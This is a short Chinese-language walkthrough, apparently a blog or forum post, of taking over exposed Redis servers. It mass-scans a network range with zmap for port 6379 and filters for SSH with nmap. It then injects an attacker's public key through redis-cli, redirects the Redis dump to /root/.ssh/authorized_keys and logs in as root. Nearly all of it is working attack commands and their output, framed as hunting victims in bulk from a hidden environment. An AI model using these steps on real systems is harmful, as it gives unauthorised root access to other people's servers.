先上 zmap 這個大殺器大範圍找安裝 redis 服務的機器,aaa.bbb.0.0 是計劃掃描的網路。
$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv
然後根據 results.csv 的結果來逐個排查,注意要能 ssh 登入的。
$ cat results.csv | xargs nmap -p 22
最後找一個隱蔽環境,開始幹活,aaa.bbb.ccc.ddd 是目標地址:
root@ab871b39330f:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory `/root/.ssh`.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f
The key`s randomart image is:
+---[RSA 2048]----+
| |
| |
| . |
| . .. o |
| . S .o o . |
| o +o . . o|
| + .o o |
| . E =.. o +|
| o + .... =+|
+-----------------+
root@ab871b39330f:~# (echo -e "
"; cat ~/.ssh/id_rsa.pub; echo -e "
") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd
The authenticity of host `aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)` can`t be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added `aaa.bbb.ccc.ddd` (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[root@mscopyright1 ~]# pwd
/root